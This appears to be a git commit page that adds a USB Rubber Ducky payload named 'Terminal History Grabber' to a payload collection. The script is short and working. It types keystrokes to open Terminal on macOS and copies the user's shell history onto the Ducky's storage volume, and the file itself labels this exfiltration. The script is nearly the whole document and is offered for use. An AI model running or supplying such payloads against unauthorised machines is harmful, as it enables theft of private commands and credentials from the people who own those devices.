Create payload.txt
Extracts the terminal history of the device onto the duckypull/43/head
parent
c14a340b69
commit
2935c1bc80
|
@ -0,0 +1,19 @@
|
|||
REM Title: Terminal History Grabber
|
||||
REM Description: Extracts the terminal history of the device onto the ducky
|
||||
REM Author: Matthew Kayne
|
||||
REM Category: Exfiltration
|
||||
REM Target: macOS (Terminal)
|
||||
REM Requires: Twin Duck firmware or separate USB stick (requires change to the path of the file)
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI SPACE
|
||||
DELAY 400
|
||||
STRING terminal
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING history > /Volumes/DUCKY/history.txt
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 200
|
||||
ENTER
|
Loading…
Reference in New Issue